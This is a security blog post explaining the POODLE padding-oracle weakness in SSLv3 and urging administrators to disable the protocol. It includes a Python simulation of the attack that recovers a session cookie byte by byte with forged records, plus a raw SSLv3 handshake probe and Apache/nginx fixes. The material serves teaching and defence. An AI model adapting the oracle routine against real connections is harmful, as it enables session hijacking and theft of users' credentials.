Let's start with a story. We were recently estimating the effort to fix a client's audit findings when I read "update web server configurations to upgrade SSL support from SSLv2 to SSLv3." To be fair to the auditor, the findings were probably written before the vulnerability I describe below (POODLE) was announced. However, SSLv3 was already viewed with suspicion, and it already had to be disabled on any system that needed to be FIPS 140-2 compliant. Not every system needs FIPS compliance, but the fact that the standard disallows SSLv3 is telling. (By the way, the auditor was correct that SSLv2 needed to be disabled. In addition to its many weaknesses, SSLv2 is not compliant with either FIPS 140-2 or the PCI DSS.)
Moral: the fact that one version of a protocol is bad doesn't make the next version acceptable.
A vulnerability in SSLv3 (CVE-2014-3566) was recently announced that affects ciphers operating in cipher block chaining (CBC) mode. SSLv3 pads plaintext out to the cipher's block size, but the receiver checks only the final padding-length byte and never the padding bytes themselves. An attacker who can submit modified records and observe whether the server accepts or rejects them can use that answer as an oracle to recover plaintext one byte at a time, at a cost of about 256 requests per byte. The vulnerability has been dubbed POODLE, for Padding Oracle On Downgraded Legacy Encryption. An attacker positioned between client and server can use it to decrypt part of an encrypted session, typically a session cookie. Note that even if both client and server support TLS (the more recent protocols), the attacker in the middle can interfere with the handshake and force many clients to fall back to SSLv3, so that the padding oracle can be used. The best explanation of how this vulnerability works is Paul Ducklin's post in Naked Security.
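To make the padding-oracle step concrete, here is a self-contained simulation. It is added here and is not code from the original post or from Ducklin's write-up. It stands a toy HMAC-based Feistel cipher in for AES/3DES and gives each record a fresh random IV; both are assumptions that do not change the attack. The SSLv3 details that matter (MAC-then-encrypt, padding bytes left unchecked, only the length byte validated) are modelled as specified. The request skeleton and the cookie value are constructed samples.

```python
"""Simulation of the SSLv3 CBC padding weakness behind POODLE.

Added example, not code from the original post. The block cipher is a toy
Feistel construction over HMAC-SHA256 (standing in for AES or 3DES) so the
script needs only the standard library; the record layout (data || MAC ||
padding), the receiver's check and the attack steps follow SSLv3, except that
each record gets a fresh random IV rather than SSLv3's chained IV.
"""
import hashlib
import hmac
import os

BLOCK, MAC_LEN, ROUNDS = 16, 20, 4
# Skeleton of the request the victim browser sends (constructed sample); the
# attacker's injected script controls only the lengths of the two fillers.
REQ_HEAD, REQ_MID, REQ_TAIL = b"POST /", b" HTTP/1.0\r\nCookie: ", b"\r\n\r\n"

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def encrypt_record(key: bytes, mac_key: bytes, data: bytes) -> bytes:
    """Sender, MAC-then-encrypt. SSLv3 leaves the padding bytes unspecified;
    only the final byte, the padding length, carries meaning."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = prev = os.urandom(BLOCK)
    out = b""
    for i in range(0, len(body), BLOCK):
        prev = block_encrypt(key, _xor(body[i:i + BLOCK], prev))
        out += prev
    return iv + out

def decrypt_record(key: bytes, mac_key: bytes, rec: bytes) -> bool:
    """Receiver: True if the record is accepted. As in SSLv3, the padding
    content is never checked, only its length byte and then the MAC."""
    prev, pt = rec[:BLOCK], b""
    for i in range(BLOCK, len(rec), BLOCK):
        pt += _xor(block_decrypt(key, rec[i:i + BLOCK]), prev)
        prev = rec[i:i + BLOCK]
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    body = pt[:len(pt) - pad_len - 1]
    expected = hmac.new(mac_key, body[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(body[-MAC_LEN:], expected)

def poodle_recover(secret_len: int, send, oracle, max_tries: int = 20000) -> bytes:
    """Attacker in the middle. send(path_len, body_len) makes the victim emit a
    fresh encrypted request with those filler lengths; oracle(record) reports
    whether the server accepted it. Costs about 256 requests per cookie byte."""
    base = len(REQ_HEAD) + len(REQ_MID)
    recovered = bytearray()
    for k in range(secret_len):
        path_len = (BLOCK - 1 - (base + k)) % BLOCK  # cookie byte k ends its block
        t = (base + path_len + k) // BLOCK           # index of that block, C_t
        # body_len makes data+MAC a block multiple, so the last block is pure padding
        body_len = -(base + path_len + secret_len + len(REQ_TAIL) + MAC_LEN) % BLOCK
        for _ in range(max_tries):
            rec = send(path_len, body_len)
            c = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # c[0]=IV, c[j+1]=C_j
            forged = c[0] + b"".join(c[1:-1]) + c[t + 1]   # C_t replaces the padding block
            if oracle(forged):  # accepted only when D(C_t) ^ C_{n-2} ends in 0x0F
                recovered.append((BLOCK - 1) ^ c[t][-1] ^ c[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check block alignment")
    return bytes(recovered)

def demo(secret: bytes = b"session=7f3a9c") -> bytes:
    """Victim and server share keys; the attacker sees only ciphertext and verdicts."""
    key, mac_key = os.urandom(16), os.urandom(16)

    def victim_send(path_len: int, body_len: int) -> bytes:
        req = REQ_HEAD + b"A" * path_len + REQ_MID + secret + REQ_TAIL + b"B" * body_len
        return encrypt_record(key, mac_key, req)

    return poodle_recover(len(secret), victim_send, lambda r: decrypt_record(key, mac_key, r))

if __name__ == "__main__":
    print(demo())
```

In the real attack the victim's browser is made to issue the requests by script the attacker has injected into an unencrypted page, every rejected record tears the connection down and the browser reconnects, and the attacker walks the cookie one byte at a time by adjusting the request path and body lengths, exactly as poodle_recover does. The forged record is accepted only when the last byte of the substituted block happens to decrypt to 0x0F, which is why it takes about 256 requests per byte, and why the root cause is SSLv3's unchecked padding rather than any implementation bug.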
Let's be clear about one thing: this is not a bug that can be patched. POODLE is a weakness in the SSLv3 protocol specification itself, not in any one implementation of it. It is what it is, and people need to stop using it. Period.
The best solution is to disable SSLv2 and SSLv3 support in all of your browsers and web servers. The only plausible reason to keep SSLv3 on a web server is clients still running IE6 on Windows XP, which does not use TLS 1.0 by default; I would recommend that you configure your servers securely and drop support for IE6. If you absolutely must keep SSLv3, at minimum disable all ciphers that operate in CBC mode (which leaves only RC4, itself a weak cipher), but it's better to just disable the protocol and support only TLS 1.0, TLS 1.1, and TLS 1.2. For browsers, just disable SSLv2 and SSLv3. For Windows, you should be able to do this with a group policy object.
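As an added check, not part of the original post, the following script sends a hand-built SSLv3 ClientHello offering only CBC cipher suites and reports whether the server completes the handshake. It works at the record level rather than calling OpenSSL because current OpenSSL builds no longer let `s_client -ssl3` do this. The target host is whatever you pass on the command line; the ServerHello and alert bytes used to exercise classify_response offline are constructed samples.

```python
"""Raw SSLv3 probe: does a server still accept an SSLv3 ClientHello?

Added example, not from the original post. It hand-builds the SSLv3 record
with the standard library, since current OpenSSL builds no longer offer
SSLv3 in s_client. classify_response() can be run offline on captured
bytes; probe() sends the hello to a live host.
"""
import os
import socket
import struct
import sys

SSLV3 = b"\x03\x00"                 # record/handshake version for SSL 3.0
HANDSHAKE, ALERT = 0x16, 0x15       # record content types
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02
# IANA cipher-suite codes. Only CBC-mode suites are offered, so a ServerHello
# means the server is willing to run exactly the configuration POODLE attacks.
CBC_SUITES = {
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
}
ALERT_NAMES = {40: "handshake_failure", 70: "protocol_version"}


def build_sslv3_client_hello() -> bytes:
    """Handshake record carrying a ClientHello. SSLv3 has no extensions."""
    suites = b"".join(struct.pack("!H", s) for s in CBC_SUITES)
    body = (SSLV3                      # client_version
            + os.urandom(32)           # client random
            + b"\x00"                  # empty session_id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00")             # one compression method: null
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + SSLV3 + struct.pack("!H", len(hs)) + hs


def classify_response(data: bytes) -> dict:
    """Classify the first record a server sent back.

    Returns {'sslv3': True, 'suite': code, 'name': ...} if the server chose
    an SSLv3 cipher suite, otherwise {'sslv3': False, 'reason': ...}.
    """
    if len(data) < 5:
        return {"sslv3": False, "reason": "connection closed without a record"}
    ctype, _vmaj, _vmin, rlen = struct.unpack("!BBBH", data[:5])
    payload = data[5:5 + rlen]
    if ctype == ALERT and len(payload) >= 2:
        desc = payload[1]
        return {"sslv3": False,
                "reason": f"alert {desc} ({ALERT_NAMES.get(desc, 'other')})"}
    if ctype == HANDSHAKE and len(payload) >= 41 and payload[0] == SERVER_HELLO:
        # ServerHello: type(1) len(3) version(2) random(32) sid_len(1) sid cs(2)
        sid_len = payload[38]
        if len(payload) < 41 + sid_len:
            return {"sslv3": False, "reason": "truncated ServerHello"}
        if payload[4:6] != SSLV3:
            return {"sslv3": False, "reason": f"negotiated version {payload[4:6].hex()}"}
        suite = struct.unpack("!H", payload[39 + sid_len:41 + sid_len])[0]
        return {"sslv3": True, "suite": suite,
                "name": CBC_SUITES.get(suite, f"0x{suite:04x}")}
    return {"sslv3": False, "reason": f"unexpected record type 0x{ctype:02x}"}


def probe(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Send the SSLv3 ClientHello to host:port and classify what comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            reply = sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            reply = b""          # a reset or silence also means "not accepted"
    return classify_response(reply)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} host [port]")
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    print(host, port, probe(host, port))
```

On Apache the corresponding server-side fix is `SSLProtocol all -SSLv2 -SSLv3`; on nginx it is `ssl_protocols TLSv1 TLSv1.1 TLSv1.2;`. After the change the probe should report an alert (handshake_failure or protocol_version) or a closed connection rather than a ServerHello. The probe only tells you what your server accepts; it does not test whether a client in front of it can be pushed into an SSLv3 fallback.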
SSL has taken it on the chin this year, first with Heartbleed and now this. We all need to fix our server configurations so that the little lock icon actually means the connection is secure.
About Andy Sherman
Andy Sherman, Eden Technologies' security practice lead, has a PhD in physics from Rensselaer Polytechnic Institute and started his career in the academic world. He then went to AT&T Bell Laboratories, where he discovered the power, and hazards, of large distributed computer networks. It was also at Bell Labs, during the early days of the Internet, that Andy became interested in the security problems associated with public networks. From Bell Labs Andy moved to the financial services industry. There he worked on a large range of infrastructure design, deployment, and management projects, but is best known for his 15+ years in information and technology security.